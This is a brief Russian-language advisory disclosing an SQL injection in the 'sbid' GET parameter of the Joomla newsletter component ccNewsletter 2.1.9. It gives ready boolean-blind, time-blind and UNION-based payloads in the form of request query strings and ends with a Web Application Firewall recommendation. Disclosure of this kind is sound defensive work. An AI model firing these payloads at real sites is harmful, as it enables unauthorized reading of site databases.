В популятрном компоненте для Jоomla ccNewsletter в версии 2.1.9 была найдена SQL-инъекция. Уязвимость может быть использована для получения доступа к информации в базе данных.

ccNewsletter - это компонент почтовых рассылок для Joomla, он представляет из себя сервис для отправки новостной рассылки подписчикам сайта joomla.

Уязввимым является параметр 'sbid' и он уязмим к boolean-based blind, time-based blind и UNION query SQL-инъекциям. Передается этот параметр методом GET.

Эта уязвимость существует из-за недостаточной фильтрации входных данных для этого параметра.

    Пример эксплуатации уязвимости:

  • boolean-based blind
  • option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter
  • time-based blind
  • option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
  • UNION query
  • option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter

Использование Web Application Firewall позволяет блокировать подобные атаки